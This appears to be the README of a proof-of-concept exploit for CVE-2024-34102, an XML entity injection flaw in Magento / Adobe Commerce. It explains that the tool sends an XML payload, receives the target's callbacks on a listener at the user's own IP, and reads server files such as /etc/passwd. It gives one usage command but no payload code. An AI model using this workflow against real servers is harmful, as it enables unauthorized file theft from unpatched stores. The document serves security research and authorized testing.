# CVE-2024-34102
POC for CVE-2024-34102. A pre-authentication XML entity injection issue in Magento / Adobe Commerce. 


## Overview

This POC will attempt to read files from target hosts that are vulnerable to the recent Magento / Adobe Commerce CVE-2024-34102. This POC is based on this [security advisory]( and this research by [Assetnote](

## How to Use

In order to run this poc, you will have to have a machine with published and accessible IP. 

### What This POC Does

1. Creates a local file `poc.xml` containing the main payloads.
2. Sends the payload to the target via a POST request.
3. Sets up a listener on your machine for incoming GET requests from the target.
4. Attempts to read files from the target (default: `/etc/passwd`).

### Minimum Requirements

- Python 3.6 or higher
- `requests` library
To use this POC against a single target:
python -u target -ip your-machine-ip -p any-open-port-in-your-machine -r file-to-read-from-target (default is /etc/passwd)

## Contact

For any suggestions or thoughts, please get in touch with [me](

## Disclaimer

This provided tool is for educational purposes only. I do not encourage, condone, or support unauthorized access to any system or network. Use this tool responsibly and only on systems you have explicit permission to test. Any actions and consequences resulting from misuse of this tool are your own responsibility.

## References